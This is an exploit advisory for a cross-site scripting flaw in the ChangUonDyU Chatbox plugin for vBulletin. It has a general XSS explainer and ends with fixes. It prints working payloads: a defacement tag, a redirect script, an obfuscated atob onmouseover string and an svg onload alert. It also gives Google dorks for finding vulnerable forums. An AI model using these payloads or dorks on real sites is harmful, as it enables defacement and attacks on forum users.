vBulletin 4.2.0 ChangUonDyU Chatbox Plugins 3.6.0 XSS

1. ##########################################################################
2.  
3. # Exploit Title : vBulletin 4.2.0 ChangUonDyU Chatbox Plugins 3.6.0 Cross Site Scripting
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 26/02/2019
7. # Vendor Homepages : vbulletin.com ~ vietvbb.vn
8. # Software Download Link : vietvbb.vn/up/showthread.php?t=40346&page=3
9. # Software Information Link : vbulletin-mods.com/forum/showthread.php?t=2775
10. vbulletin-mods.com/forum/showthread.php?t=2767&s=1d1c28bb9eae0a6f559e2dcd3efc14d5
11. # Software Affected Versions : VBulletin 3.8.3 ~ 3.8.7 ~ 4.x.x - 4.1.10 ~ 4.2.0
12. ChangUonDyU Chatbox 3.6.0 and all previous versions
13. # Tested On : Windows and Linux
14. # Category : WebApps
15. # Exploit Risk : Medium
16. # Vulnerability Type :
17. CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
18. CWE-83 [ Improper Neutralization of Script in Attributes in a Web Page ]
19. CWE-87 [ Improper Neutralization of Alternate XSS Syntax ]
20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
23. # Reference Links : cxsecurity.com/issue/WLB-2019020266
24.  
25. ####################################################################
26.  
27. # Description about Software :
28. ***************************
29. ChangUonDyU is a chatbox plugin for VBulletin.
30.  
31. ####################################################################
32.  
33. # Impact :
34. ***********
35. * The software does not neutralize or incorrectly neutralizes "javascript:" or other URIs from
36.  
37. dangerous attributes within tags, such as onmouseover, onload, onerror, or style.
38.  
39. * The software does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.
40.  
41. * The software does not neutralize or incorrectly neutralizes user-controllable input before
42.  
43. it is placed in output that is used as a web page that is served to other users.
44.  
45. Cross-site scripting (XSS) vulnerabilities occur when:
46. ***********************************************
47. 1. Untrusted data enters a web application, typically from a web request.
48.  
49. 2. The web application dynamically generates a web page that contains this untrusted data.
50.  
51. 3. During page generation, the application does not prevent the data from containing content that is
52.  
53. executable by a web browser, such as JavaScript, HTML tags,
54.  
55. HTML attributes, mouse events, Flash, ActiveX, etc.
56.  
57. 4. A victim visits the generated web page through a web browser, which contains
58.  
59. malicious script that was injected using the untrusted data.
60.  
61. 5. Since the script comes from a web page that was sent by the web server, the victim's
62.  
63. web browser executes the malicious script in the context of the web server's domain.
64.  
65. 6. This effectively violates the intention of the web browser's same-origin policy, which
66.  
67. states that scripts in one domain should not be able to access resources or run code in a different domain.
68.  
69. There are three main kinds of XSS:
70. ******************************
71. Type 1: Reflected XSS (or Non-Persistent) - The server reads data directly from the HTTP request and
72. reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes
73. a victim to supply dangerous content to a vulnerable web application, which is then reflected
74. back to the victim and executed by the web browser. The most common mechanism for
75. delivering malicious content is to include it as a parameter in a URL that is posted publicly
76. or e-mailed directly to the victim. URLs constructed in this manner constitute the core of
77. many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers
78. to a vulnerable site. After the site reflects the attacker's content back to the victim,
79. the content is executed by the victim's browser.
80.  
81. Type 2: Stored XSS (or Persistent) - The application stores dangerous data in a database,
82. message forum, visitor log, or other trusted data store. At a later time, the dangerous
83. data is subsequently read back into the application and included in dynamic content.
84. From an attacker's perspective, the optimal place to inject malicious content is in an area
85. that is displayed to either many users or particularly interesting users.
86. Interesting users typically have elevated privileges in the application or interact with
87. sensitive data that is valuable to the attacker. If one of these users executes malicious content,
88. the attacker may be able to perform privileged operations on behalf of the user or gain access
89. to sensitive data belonging to the user. For example, the attacker might inject XSS into
90. a log message, which might not be handled properly when an administrator views the logs.
91.  
92. Type 0: DOM-Based XSS - In DOM-based XSS, the client performs the injection of
93. XSS into the page; in the other types, the server performs the injection. DOM-based XSS
94. generally involves server-controlled, trusted script that is sent to the client, such as
95. Javascript that performs sanity checks on a form before the user submits it.
96. If the server-supplied script processes user-supplied data and then injects it
97. back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.
98.  
99. ####################################################################
100.  
101. Cross Site Scripting XSS Exploit :
102. *****************************
103. [VULNERABLESITE]/chatbox/archive.php?page=[XSS]
104.  
105. # Example XSS Payload :
106. ************************
107. /forum/chatbox/archive.php?page=[XSS Vulnerability]
108.  
109. <marquee>XSS-Vulnerability-Discovered-By-KingSkrupellos</marquee>
110.  
111. <script>location.href="https://www.[YOUR-DESIRED-DOMAIN-ADDRESS].gov/"</script>
112.  
113. Example Dangerous JavaScript Code :
114. ********************************
115. ' size=99 onmouseover=document.write(atob('aHR0cHM6Ly93d3cuY3liZXJpem0ub3JnLw====')); a='asd
116.  
117. Proof of Concept :
118. *****************
119. Create a new thread with the following payload as the title <svg onload=alert('XSS')>
120.  
121. The alert will appear on the index page
122.  
123. # Index Page :
124. ************
125. /forum/chatbox/index.php
126.  
127. Note : Here, you can read all chats conversations without being a member.
128.  
129. Encode and Decode URL Links:
130. ****************************
131. base64encode.org
132. base64decode.org
133.  
134. # Example Google Dorks :
135. ***********************
136. intext:Powered by vBulletin® Version 4.2.0
137. intext:Copyright © 2019 vBulletin Solutions, Inc. All rights reserved.
138.  
139. [VBB3] ChangUonDyU - Extra File Chatbox 3.6.0 ?=>
140. ***********************************************
141.  
142. Installation =>
143.  
144. - Find a host to put chatbox upload folder chatbox on it (chmod 777 all the txt file)
145. - Import Product: ChanguonDyU - Extra File Chatbox 3.0.xml
146. - Revert (Restore) the template of the old version (if installed and edit)
147. - Edit template FORUMHOME, search
148.  
149. $ Navbar
150.  
151. $ Changfcb
152.  
153. It is located chatbox on the homepage, but if want chatbox on
154. every page, insert $changfcb at the end of the template navbar
155. - At vBulletin Options> ChangUonDyU - Extra File Chatbox 3.0
156.  
157. Change the directory path to the chatbox
158. Change the path to the file smilies
159. Key to the chatbox
160.  
161. Edit the config.php file
162. + Find $ config ['forumlink'] and change your forum domain
163. (If you use multiple domain forum enter multiple domains, each separated domain, eg
164. "Quote" $ config ['forumlink'] = 'EXAMPLE.gov, EXAMPLEDOMAIN1.gov/forum'
165. + $ Config ['password_tools']: Password access tools.php file
166. + $ Config ['chatboxkey']: Enter the same key as entered in vbulletin options
167.  
168. ####################################################################
169.  
170. Solution 1 : Install latest version 6.0.0 or 6.0.1. For prevent XSS Cross Site Scripting Vulnerability.
171. ************
172. Prevent Scripting Injection => Edit this File =>
173.  
174. if ($_GET['page'])
175. {
176. $page = htmlentities(strip_tags($_GET['page']));
177. }
178. else
179. {
180. $page = 1;
181. }
182.  
183. Note : But 6.0.1 has SQL Injection Vulnerability
184.  
185. Here is the Details [ Published Date 2012-11-02 ] => Reference Link => exploit-db.com/exploits/22429
186.  
187. 6.0.1
188. Add Latest Comments (with mod ChangUonDyU - Comment for Each Post)
189. keyword: latestcomment
190.  
191. 6.0.0
192. Here is a fairly complete version
193. What's new?
194. - Secure more
195. - Beautiful presentation and standard
196. - Add 1 statistics such as:
197.  
198. Most topics are answered (Most replied Thread also called Hotest Threads)
199. Members sent more topics (Top Thread Starters)
200. Members were recently (Latest Banned Users)
201. Polls latest (Newest)
202. Voted the most vote (Most Voted Polls)
203.  
204. ####################################################################
205.  
206. # Solution 2 to Fix this Bug in Details :
207. **********************************
208. This Vulnerability Fix is like ChangUonDyU Chatbox Plugins 3.6.0 =>
209.  
210. Reference Link :
211.  
212. packetstormsecurity.com/files/151849/MyBB-1.6.x-ChangUonDyU-Chatbox-3.6.0-Cross-Site-Scripting.html
213.  
214. Now - Find chatbox folder/config.php - Find the codes below
215.  
216. $config['forumlink'] = 'domain1.net/forum,domain2.com'; //Forum url
217.  
218. Here is the link which domain should be run. We will edit this file like this.
219. For example ; We can enter forum.[VULNERABLESITE].gov and [VULNERABLESITE].gov/FORUM
220.  
221. $config['forumlink'] = '[VULNERABLESITE].com/forum,forum.[VULNERABLESITE].com'; //Forum url
222.  
223. If the domain is unique - so we change this file like this ;
224.  
225. $config['forumlink'] = '[VULNERABLESITE].com'; //Forum url
226.  
227. Then
228.  
229. $config['chatboxkey'] = 'your_chatbox_key'; // ChatboxKey
230.  
231. Find this chatbox key. It should be longer. Nobody should guess it. Note this key somewhere. Then find this codes.
232.  
233. $config['check_domain_reffer'] = false; // Check reffer url
234. $config['check_chatbox_key'] = false; // check ChatboxKey
235.  
236. Change with this codes.
237.  
238. $config['check_domain_reffer'] = true; // Check reffer url
239. $config['check_chatbox_key'] = true; // check ChatboxKey
240.  
241. Then save the file.
242.  
243. Then => Administration Panel => Settings => Forum Settings => ChangUonDyU Chatbox Extensions => Enter here your [ your_chatbox_key ] and save it.
244.  
245. If you want to change [ Access Denied (Invaild ChatboxKey or URL) ] keywords. Go to the config.php and save this file however you wish.
246.  
247. $phrase['accessdenied'] = "<b>Access Denied (Invaild ChatboxKey or URL)</b>";
248.  
249. That's all. The Bug has been fixed.
250.  
251. ####################################################################
252.  
253. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
254.  
255. ####################################################################